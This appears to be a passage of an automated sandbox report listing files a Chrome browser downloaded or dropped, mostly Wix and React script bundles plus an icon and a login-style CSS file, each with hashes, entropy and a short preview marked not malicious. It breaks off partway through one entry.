                                                                                                                                                                                                                        SSDEEP:768:ayQ3y6nduH+QsvhU34+6DLnk2KKZaupiS11bDaQhCLoaVTIjTGTiuK4y+aNsFwkJ:aJzZjnEXVEbEt6FjcnIdA0qLmmuuh8qn
                                                                                                                                                                                                                        MD5:5FD90FAF2C188202D6C4D15BAFEEB084
                                                                                                                                                                                                                        SHA1:D6AA0630BAFA6FEE85C99B62ABB0EE697FC7066F
                                                                                                                                                                                                                        SHA-256:91EFCF4CF8ED21A8A1277892416644E9563FFFB4CDEC1E5CAD3C5AD9EF39D7E8
                                                                                                                                                                                                                        SHA-512:BA90FC38CAFB0FCB7544024530C08955027384AE400E0E863975C54202ED3EC364397E4FD6FC804467D81BB9B5B7732DB700101655A3A66616EF4EC1C0D42EEB
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/wix-thunderbolt/dist/group_4.4a5c74ed.chunk.min.js
                                                                                                                                                                                                                        Preview:(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[6469],{18447:(e,t,r)=>{"use strict";r.r(t),r.d(t,{OnLinkClickSymbol:()=>n.c7,PreviewTooltipCallback:()=>f,PreviewTooltipCallbackSymbol:()=>n.pK,name:()=>n.UU,site:()=>b});var n=r(93455),o=r(77748),a=r(32166),i=r(82658),s=r(41594),l=r.n(s);const d=(0,o.Og)([a.RV,n.c7,a.TQ],((e,{onLinkClick:t},r)=>({appDidMount:()=>{if(!(0,i.fU)(e))return e.addEventListener("click",t),r.mode.debug&&l().version.startsWith("18")&&Array.from(document.querySelectorAll?.("a")||[]).map((e=>e.addEventListener("click",t))),()=>{e.removeEventListener("click",t)}}})));var c=r(16537),u=r(10553),p=r(12482),g=r(48603),m=r(45468);const h=(e,t)=>!t["specs.thunderbolt.lightboxFromButton"]||e&&"button"!==e.tagName.toLowerCase(),y=(0,o.Og)([u.n,p.Fh,(0,o.m3)(p.y7),a.RV],((e,t,r,n)=>{const o=[],a=[];return{onLinkClick:async n=>{let i=!0;if(n.metaKey||n.ctrlKey)return;const s=((e,t)=>{let r=e.target;for(;r&&(!r.tagName||"a"!==r.tagNam
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65171)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):66324
                                                                                                                                                                                                                        Entropy (8bit):5.399497154388185
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:sien5AqTPH9jxe3nMOD8a5ZZSN0M/0OSai5Y0cczYk/ygfS8QUnAY:sieB/9jt2yk/u9ij
                                                                                                                                                                                                                        MD5:A8D4910360403854978FA0D4E1719619
                                                                                                                                                                                                                        SHA1:048C1C7316BD8D3B2172F2A0D4F944283E7EAA37
                                                                                                                                                                                                                        SHA-256:3DF8FC54BAF7898B71258B1805FACA1DE3A1D2E54517DF2FDFF4A5AF9BBFC01D
                                                                                                                                                                                                                        SHA-512:49EDC621DF02A3C89FF6CE1B695F552A1A9EF2F55D2BA1962C5402B7DFB8E3BD3A6C22CCDEBE5A066508319224C65374A26CD5AE1C23466E413EEBC001288C95
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/wix-thunderbolt/dist/group_3.0be98eee.chunk.min.js
                                                                                                                                                                                                                        Preview:(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[266],{62289:(e,t,n)=>{"use strict";t.YZ=void 0;var r=n(71764);Object.defineProperty(t,"YZ",{enumerable:!0,get:function(){return r.hashString}})},64846:(e,t,n)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.hashPhone=t.hashEmail=t.digest=void 0;var r=n(5292),o="@@@wix-D15BA8F5-3031-42CA-BD43-0B68F418B2F0@@@";function a(e){return r(e+o)}t.digest=a,t.hashEmail=function(e){var t=e.lastIndexOf("@"),n=e.substr(0,t),r=e.substr(t+1);return"wix.com"!==r&&(n=a(n)),"".concat(n,"@").concat(r)},t.hashPhone=function(e){for(var t=a(e),n=e.substr(0,e.length-5),r="",o=0;o<t.length&&r.length<5;o++)isNaN(t[o])||(r+=t[o]);return"".concat(n).concat(r)}},23097:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.replaceEmails=void 0;var n=o(["=","/","?","(",")","[","]",'"',"'","&","@"]),r=o(["!","#","$","%","&","'","*","+","/","=","?","^","_","`","{","}","(",")","[","]","|","@",";
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):15406
                                                                                                                                                                                                                        Entropy (8bit):4.967552114438246
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:2xApRWtvbsjgIYYQlV47U/1z8QsCj99/R1qa/PRZs6M75m4vU6GCi28urvZQYH3:FRIwcVeq8wjjLENG72tl
                                                                                                                                                                                                                        MD5:31D62B976C16DB52CBF0D5631BCDE62C
                                                                                                                                                                                                                        SHA1:18F2D0B838D766B642E787E222075DDFF5285662
                                                                                                                                                                                                                        SHA-256:04663FB0B01FC27B402519F0B000DB2B98EF3754C8C99C21E304262D2353AB62
                                                                                                                                                                                                                        SHA-512:104E20B3977B6ADAF6847D62199656A4E93CA3478D78335DBA65B807C4375E8AA3FB41BD12B3EA0CF11C689C21BC1486DA063415372F4AD090D95DC2517880E1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://umbrellabusses.com/samhentir/img/ffg.ico
                                                                                                                                                                                                                        Preview:............ .h...6... .... .(.......00.... .h&......(....... ..... ....................................................o..o.z.................................................v.........{...u.v.m.................................O.................y...r...l..g.O.................x...n!..c...a/..............w...o...h...c..._...Zx..........z9..v-..q!..h...^...b:..~.......t...j...c...^...Z}..Wz..........zH..zE..y<..u...o!..f..W.a.|.a.n..c...\...Xy..Uv..Tq..........zS..{T..{T..{Q..yG..v...........d...Y{.Tu..Po..Kh..t\..........{`..|b..|e..|i..|n..................Mk..If..C]..lS...P..........{l..|p..|u..}}..}.z.................C^z.ST..O...O...O..........}x..}|..}...}...mw..I7...........N..L...M...M...N...N..........}...}...}...~...ag..\9..xC..G..I..K...K...L...M...N..........}...}...~...~...ak..^:..{C..F..H..I..K..K...L...M..........x...}...~.......bl.._;..|C..F...G..I..J..K..K...K..................~.O....gt..a;..}C..F..G..H..I..JO......................
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2510)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):2631
                                                                                                                                                                                                                        Entropy (8bit):5.375891908919065
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:VEhz8RhRfMsPMSHKQtGmhRRARxupeDUkCfYcEaM55kXPez9:VactG/ifxMX+Wz9
                                                                                                                                                                                                                        MD5:57F88F8B36A1258E0BA372B861809678
                                                                                                                                                                                                                        SHA1:7F8DFAAEA3FE6769DD70BFD9AD4B5AF9AAA3637C
                                                                                                                                                                                                                        SHA-256:55BC522B84C05AA87EFAC86DFE38C75ADE0DC838C44C72D8BA6C663A70CD9667
                                                                                                                                                                                                                        SHA-512:471605AF94A623E70E6A30221B2532EBBB64270B9010CBD6033381773CB8124F1F6F928B01F0801B97A3E111469B3E42BBB965BFBDCDC4ECB1766AB6B49A9BB5
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/wix-thunderbolt/dist/windowScroll.60e92730.chunk.min.js
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[316,3605],{81220:(u,c,t)=>{t.d(c,{Qf:()=>n,S7:()=>r,T_:()=>i,tn:()=>b,xg:()=>e});const e=u=>-(Math.cos(Math.PI*u)-1)/2,i=u=>u<.5?2*u**2:1-(-2*u+2)**2/2,b=u=>u<.5?(1-Math.sqrt(1-4*u**2))/2:(Math.sqrt(-(2*u-3)*(2*u-1))+1)/2,n={linear:u=>u,sineIn:u=>1-Math.cos(u*Math.PI/2),sineOut:u=>Math.sin(u*Math.PI/2),sineInOut:e,quadIn:u=>u**2,quadOut:u=>1-(1-u)**2,quadInOut:i,cubicIn:u=>u**3,cubicOut:u=>1-(1-u)**3,cubicInOut:u=>u<.5?4*u**3:1-(-2*u+2)**3/2,quartIn:u=>u**4,quartOut:u=>1-(1-u)**4,quartInOut:u=>u<.5?8*u**4:1-(-2*u+2)**4/2,quintIn:u=>u**5,quintOut:u=>1-(1-u)**5,quintInOut:u=>u<.5?16*u**5:1-(-2*u+2)**5/2,expoIn:u=>0===u?0:2**(10*u-10),expoOut:u=>1===u?1:1-2**(-10*u),expoInOut:u=>0===u?0:1===u?1:u<.5?2**(20*u-10)/2:(2-2**(-20*u+10))/2,circIn:u=>1-Math.sqrt(1-u**2),circOut:u=>Math.sqrt(1-(u-1)**2),circInOut:b,backIn:u=>2.70158*u**3-1.70158*u**2,backOut:u=>1+2.70158*(u-1)**3+1.70158*(u-1)*
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (25431)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):25545
                                                                                                                                                                                                                        Entropy (8bit):5.283934807984521
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:YzQKTfF3tdx9BDic5LsXeQds9R7QCGQOa4Sbs+J6dO9JtpR940jcYKu/d9r4yjVG:mJtj9w5sBsc9fr9nR9NLI
                                                                                                                                                                                                                        MD5:3420CFF8BF368157EF7C715BE4697C42
                                                                                                                                                                                                                        SHA1:12A8368B5E5D6A713342F878A644E1E76D9E1104
                                                                                                                                                                                                                        SHA-256:69DF0473F3ED7A6228FCF880A740F9D7FA2C1F8521F798753FB29DB4272D0485
                                                                                                                                                                                                                        SHA-512:C14726D5ABD32A755D194146B228A703CF5C59BEC59B3717531796ECAE40A441A68987F0493F5082B4E4A910E98F78302DD62500D9B35CE25A84D82E219F0E0A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[8875],{58223:(e,t,i)=>{i.d(t,{Rr:()=>x,Aq:()=>h,p7:()=>v,jh:()=>R,EH:()=>$,KU:()=>l,_o:()=>a,vk:()=>d,NL:()=>y,yO:()=>g});var n=i(17709),s=i.n(n);const r=(e,t,i)=>{let n=1,s=0;for(let r=0;r<e.length;r++){const o=e[r];if(o>t)return!1;if(s+=o,s>t&&(n++,s=o,n>i))return!1}return!0},o=(e,t,i)=>{let n=-1/0;const s=e.map((e=>(e.height+t>n&&(n=e.height+t),e.height+t)));let o=n,a=n*e.length,l=n;for(;o<a;){const e=Math.floor((o+a)/2);r(s,e,i)?a=e:o=e+1,l=o}return l-t};function a(){class e extends HTMLElement{constructor(){super(...arguments),this.containerWidth=0,this.isActive=!1,this.isDuringCalc=!1,this.attachObservers=()=>{this.mutationObserver?.observe(this,{childList:!0,subtree:!0}),this.containerWidthObserver?.observe(this),Array.from(this.children).forEach((e=>{this.handleItemAdded(e)}))},this.detachHeightCalcObservers=()=>{this.mutationObserver?.disconnect(),this.containerWidthObserver
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:assembler source, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):6877
                                                                                                                                                                                                                        Entropy (8bit):3.974855038595408
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:0VOSzbLy26g8ez4uC33aosMpkoziFo9ptR9ElQ76+P:0cSz9vz4uGjsyfziFCptR9ElQr
                                                                                                                                                                                                                        MD5:130F4EF1C9F2861450ED48EB50576078
                                                                                                                                                                                                                        SHA1:A1807779E0714F34620CC0B8B0DB33466BD81FD0
                                                                                                                                                                                                                        SHA-256:1E16246ABCEE3F7A006FEB47D1BA5172D6AB5C20087D38D2139A40BDEB9B6524
                                                                                                                                                                                                                        SHA-512:A7BBB49DDCCDEC50CFE6BEFDA3905F48A4E2161E32314AE9C39F7D2B52B2457877DADC87DA10654B084924024B298E40B170814EFCE2F7C888C658C3134CE0D4
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://umbrellabusses.com/samhentir/css/main.css
                                                                                                                                                                                                                        Preview: * {.. margin: 0;.. padding: 0;.. box-sizing: border-box;.. }.. body {.. font-family: 'Segoe UI', sans-serif;.. }.. .headbox {.. background-color: #0078D7;.. padding: 14px 10px;.. }.. .logBox {.. text-align: center;.. margin: 20px 0;.. background-image: url("../img/log.png");.. background-repeat: no-repeat;.. background-size: 55px 55px; /* Adjust size */.. height: 55px; /* Set height to match image */.. width: 55px; /* Set width to match image */.. margin: 0 auto; /* Center the image box */.. }.. .mainContainer {.. width: 30%;.. margin: 0 auto;.. background-color: #fff;.. box-shadow: rgba(100, 100, 111, 0.2) 0px 7px 29px 0px;.. border-radius: 5px;.. margin-top: 20px;.. margin-bottom: 10px;.. }..
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):152
                                                                                                                                                                                                                        Entropy (8bit):5.157416982226047
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:jTqNHhORZQ1rPS1VVgD3ORZQ1rPS1VVHKVRNrnJMIu70qeve7iYN:+hfrPS9G3frPS9urr9urevjG
                                                                                                                                                                                                                        MD5:17DC6142A5674DC31C4E4AC8AB3502FC
                                                                                                                                                                                                                        SHA1:066F60D99686E705ADB9CCD5323DD136A1C2A716
                                                                                                                                                                                                                        SHA-256:423B554FD53D47F5F245F759204FABAE4E91632EBF7CD0BE1DCB1ACA9C0685C5
                                                                                                                                                                                                                        SHA-512:B9596A71DFCA7ED3E0430282EDC292769144DBA1EBD8A42DA755BE2D9F4298FD0BDFA9EB0BD24B8ACA490F4D01F850C26E20D261577B64DF38E8D48769ED068D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[867],{6589:()=>{}},p=>{var s;s=6589,p(p.s=s)}]);
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4293)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):6088
                                                                                                                                                                                                                        Entropy (8bit):5.337558561572514
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:C/lsztkK8bzmdJ8apr57lHmSz/k2/AkxW4WBWsWGtxBv11BZDeyMpu:C/leKz+80VJxDB/hW4WBWsDxBv11LCyt
                                                                                                                                                                                                                        MD5:0022D406FBBD37299590C9DFCB9E8438
                                                                                                                                                                                                                        SHA1:4C22DA1D82EC80455C8FE215B9931D8EA01EE8D7
                                                                                                                                                                                                                        SHA-256:45B1DAB313ABA771527F0A61C98659B5C6CF31A9459F72CF70AC2B27B8673CAF
                                                                                                                                                                                                                        SHA-512:D06FB9CED1909AB8E2983EA29F3EE856778B55BAAE78206B6153492C906F0366496E72E5FCEEF8662F8FE1748E8478F0F39F6F5337DF31B5792C44524BF37A5E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/wix-thunderbolt/dist/browser-deprecation.bundle.es5.js
                                                                                                                                                                                                                        Preview:"use strict";(function(){// src/reportPhaseStarted.ts.var _window=window;function uuidv4(){return"xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g,function(c){var r=Math.random()*16|0,v=c==="x"?r:r&3|8;return v.toString(16)})}function sendBI(evid){var extra=arguments.length>1&&arguments[1]!==undefined?arguments[1]:"";var _window$fedops$data=_window.fedops.data,site=_window$fedops$data.site,rollout=_window$fedops$data.rollout,fleetConfig=_window$fedops$data.fleetConfig,requestUrl=_window$fedops$data.requestUrl,frogOnUserDomain=_window$fedops$data.frogOnUserDomain;if(requestUrl.includes("suppressbi=true")){return}var fedOpsAppName=site.appNameForBiEvents;var isDACRollout=rollout.isDACRollout,siteAssetsVersionsRollout=rollout.siteAssetsVersionsRollout;var is_dac_rollout=isDACRollout?1:0;var is_sav_rollout=siteAssetsVersionsRollout?1:0;var is_rollout=fleetConfig.code===0||fleetConfig.code===1?fleetConfig.code:null;var pageVisibilty=document.visibilityState;var types={WixSite:1,UGC:2,T
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (34344)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):34525
                                                                                                                                                                                                                        Entropy (8bit):5.579546412668395
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:pN9nXdO+qTmjeMIfpNUQgF0U4OnV/iz0N3MXYCKLGJyH4ejcVQBlnI3KbqNIYMrk:pN9biAOcEJJyHzv5dpi2LmH
                                                                                                                                                                                                                        MD5:5ACDE22DED43B52C303764D4750B1770
                                                                                                                                                                                                                        SHA1:7757A7E3F4E0BEAE8EBB97991C7017FB1BAC1B74
                                                                                                                                                                                                                        SHA-256:A3838845E302E733A0C87F413C343FCE49465995952DAE20E4CDFFBAF78D442D
                                                                                                                                                                                                                        SHA-512:BCE2ABBE04076AE0D524BD7180E8D283582091A26DF30903221811561715EDF18E9B80490EFC3D63C57285DD91CEE10172CC716804698E5B40DF2228D3934636
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("react")):"function"==typeof define&&define.amd?define("rb_wixui.thunderbolt[StripColumnsContainer_Default]",["react"],t):"object"==typeof exports?exports["rb_wixui.thunderbolt[StripColumnsContainer_Default]"]=t(require("react")):e["rb_wixui.thunderbolt[StripColumnsContainer_Default]"]=t(e.React)}("undefined"!=typeof self?self:this,(function(e){return function(){var t={5329:function(t){"use strict";t.exports=e},448:function(e){function t(){return e.exports=t=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},e.exports.__esModule=!0,e.exports.default=e.exports,t.apply(null,arguments)}e.exports=t,e.exports.__esModule=!0,e.exports.default=e.exports}},i={};function a(e){var n=i[e];if(void 0!==n)return n.exports;var r=i[e]={exports:{}};return t[e](r,r.exports,a),r.exports}a.n=function(
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):124860
                                                                                                                                                                                                                        Entropy (8bit):5.605709420725773
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:fwTfwHhSiCM3GFU3zoz90gT3yu1ysAzHMVcZzDwEyMdd8gB6Tuo2jntTQie+aC0V:YsBSiR3GF/zSzsAbQ4ahuaqXQfY61
                                                                                                                                                                                                                        MD5:859C551685A01F39CAB6296CBC086156
                                                                                                                                                                                                                        SHA1:E9C32C68C4FEBC50428A19AF92B5AFBF50DED2A9
                                                                                                                                                                                                                        SHA-256:552877C86B2673937CD1145593AAB68CEDC2E2037641AE4B37DFDDBCE746109F
                                                                                                                                                                                                                        SHA-512:E8687DE6239ADDA606828507CAAB618FBFA15C9565E6DB055ED4A0B68ABC2175872A62E4315F12F6A360E908A6FEB2F00CD2E981EA6D6647FF0731118EB544B4
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[671],{37669:(e,t,o)=>{o.d(t,{D:()=>r,T:()=>n});var r={COURSE:"course",SERVICE:"service"},n={FIXED:"fixed",VARIED:"varied",NO_FEE:"no_fee",CUSTOM:"custom",UNKNOWN_RATE_TYPE:"unknown_rate_type"}},15490:(e,t,o)=>{o.d(t,{s:()=>r});const r={TYPES:{GRADIENT_LINEAR:"GradientLinear",GRADIENT_ELLIPSE:"GradientEllipse",GRADIENT_CIRCLE:"GradientCircle",GRADIENT_CONIC:"GradientConic"},CSS_FUNC:{RADIAL_GRADIENT:"radial-gradient",CONIC_GRADIENT:"conic-gradient",LINEAR_GRADIENT:"linear-gradient"},REPEATING:"repeating",DEG:"deg",AT_CENTER:"at center",CIRCLE:"circle",ELLIPSE:"ellipse",FROM:"from",PERCENTAGE:"percentage",RGBA:"rgba"}},58392:(e,t)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.DuplexerSocketArtifactId=t.wsVs=t.userChannel=t.wsClient=t.WixArtifactIdHeader=void 0,t.WixArtifactIdHeader="x-wix-artifact-id",t.wsClient="ws.manager",t.userChannel="@user-inbox",t.wsVs="ws.vs",t.DuplexerS
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (548)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):10751
                                                                                                                                                                                                                        Entropy (8bit):5.3269914599293475
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:kEovMTFJ8aTY0jDAyjjf8fDye7hjI6UpAe:JoeFvHcfDbhjI6G
                                                                                                                                                                                                                        MD5:E91B2616629791B375867C298DC846CC
                                                                                                                                                                                                                        SHA1:AA77AE4C49F525BC21DE1D04F08A5D73962C7CCE
                                                                                                                                                                                                                        SHA-256:D949F1C3687AEDADCEDAC85261865F29B17CD273997E7F6B2BFC53B2F9D4C4DD
                                                                                                                                                                                                                        SHA-512:415B3C2E8E3717D952B81CA469D0DBD284970CBFC16D9E7CF2EAD6542470488A1EC10BFF1308357FCE262B753BF746D9D057E115AD584905262211BEA4844A7A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:/**. * @license React. * react.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function(){'use strict';(function(c,x){"object"===typeof exports&&"undefined"!==typeof module?x(exports):"function"===typeof define&&define.amd?define(["exports"],x):(c=c||self,x(c.React={}))})(this,function(c){function x(a){if(null===a||"object"!==typeof a)return null;a=V&&a[V]||a["@@iterator"];return"function"===typeof a?a:null}function w(a,b,e){this.props=a;this.context=b;this.refs=W;this.updater=e||X}function Y(){}function K(a,b,e){this.props=a;this.context=b;this.refs=W;this.updater=e||X}function Z(a,b,.e){var m,d={},c=null,h=null;if(null!=b)for(m in void 0!==b.ref&&(h=b.ref),void 0!==b.key&&(c=""+b.key),b)aa.call(b,m)&&!ba.hasOwnProperty(m)&&(d[m]=b[m]);var l=arguments.length-2;if(1===l)d.children=e;else if(1<l){for(var f=Array(l),k=0;k<l;k++)f[k
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (35820)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):35986
                                                                                                                                                                                                                        Entropy (8bit):5.569903304634807
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:kbRKdzorTmxZYGp4LbGhldSOfTFGClWlTJO+cQa2eU+YVQVjtwu2/BBcvIFyuYwV:Tau3blGySeUlwmYLU
                                                                                                                                                                                                                        MD5:3C2141856AA19756FA64FF89EA57714C
                                                                                                                                                                                                                        SHA1:DCA81FDB0511199EBDF9F969B4867AA35EECD2FC
                                                                                                                                                                                                                        SHA-256:B41EB18C820E54A87B4DA4E511EB99DA3DA48A3CFCBC0F4CACD950490350FEBD
                                                                                                                                                                                                                        SHA-512:C374C27209000C4B313773C1FCFD293F998D0ACCDB4BCD5BFB8CB9540AE7D3189FC311FE0BE4AB22C29F3436B01335237B796F80F7D5DB158859C74FB08175F2
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt[ClassicSection].17ff44ab.bundle.min.js
                                                                                                                                                                                                                        Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("react")):"function"==typeof define&&define.amd?define("rb_wixui.thunderbolt[ClassicSection]",["react"],t):"object"==typeof exports?exports["rb_wixui.thunderbolt[ClassicSection]"]=t(require("react")):e["rb_wixui.thunderbolt[ClassicSection]"]=t(e.React)}("undefined"!=typeof self?self:this,(function(e){return function(){var t={5329:function(t){"use strict";t.exports=e},448:function(e){function t(){return e.exports=t=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},e.exports.__esModule=!0,e.exports.default=e.exports,t.apply(null,arguments)}e.exports=t,e.exports.__esModule=!0,e.exports.default=e.exports}},i={};function a(e){var n=i[e];if(void 0!==n)return n.exports;var r=i[e]={exports:{}};return t[e](r,r.exports,a),r.exports}a.n=function(e){var t=e&&e.__esModule?function(){return e.
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (888)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1017
                                                                                                                                                                                                                        Entropy (8bit):5.1518305909584425
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:+k9Gm9e7EW3HRF1MnSlYjYNIJtG51CtTtKWEr1chdUpci6WvqGLPEaEL+SOm3I+V:z/k7Z3RFXlKT1kNrYypfvLWL3Onkg7O
                                                                                                                                                                                                                        MD5:03C1E10720544532E4C6AD6C77551D15
                                                                                                                                                                                                                        SHA1:9E138E01CF9B05526A9D7A0D3EE4D1CCD440D6E4
                                                                                                                                                                                                                        SHA-256:C1C11062E0B9E0CE036CACD15296D918EF035EC939E4CC6CE92115FF2FED60F8
                                                                                                                                                                                                                        SHA-512:523D034AD811A6CA31ABE781B483D39320F18BEBA14B2769F2608ADBE660CF47303E3E12DA57131C8D08FF14C0C00A9A0D983D0E90D7F3545594760B61A5C6E0
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[695,5377],{69434:(i,t,n)=>{n.d(t,{N:()=>m});const l={visibility:"hidden !important",overflow:"hidden !important",height:"0 !important",width:"0 !important","min-width":"0 !important","min-height":"0 !important","margin-bottom":"0 !important","margin-left":"0 !important","margin-right":"0 !important",padding:"0 !important"},o={...l,position:"absolute !important","margin-top":"0 !important"},e={visibility:null,overflow:null,height:null,width:null,"min-width":null,"min-height":null,"margin-bottom":null,"margin-left":null,"margin-right":null,padding:null},p={...e,position:null,"margin-top":null},a={visibility:"hidden !important"},r={visibility:null},m=({isResponsive:i})=>({getCollapsedStyles:()=>i?o:l,getExpandedStyles:()=>i?p:e,getHiddenStyles:()=>a,getShownStyles:()=>r})}}]);.//# sourceMappingURL=https://static.parastorage.com/services/wix-thunderbolt/dist/onloadCompsBehaviors.a5af195f
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65488), with no line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):96582
                                                                                                                                                                                                                        Entropy (8bit):5.030159498845835
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:GPW+wNgKPk6hGBKE0+gu7nyZyiddSerEZuLM1YqcScb:GPW+wNgKPkH0+gu7nyZyLut
                                                                                                                                                                                                                        MD5:638FF9757A9BF86022F623CF2A4918DD
                                                                                                                                                                                                                        SHA1:3F2E20B4562FA730E0CF66BE8078CA3AD9388B8E
                                                                                                                                                                                                                        SHA-256:2D4E292324F269614D747DA5E317FA3C3C388A85843C578DEF6BC9071D6B42E0
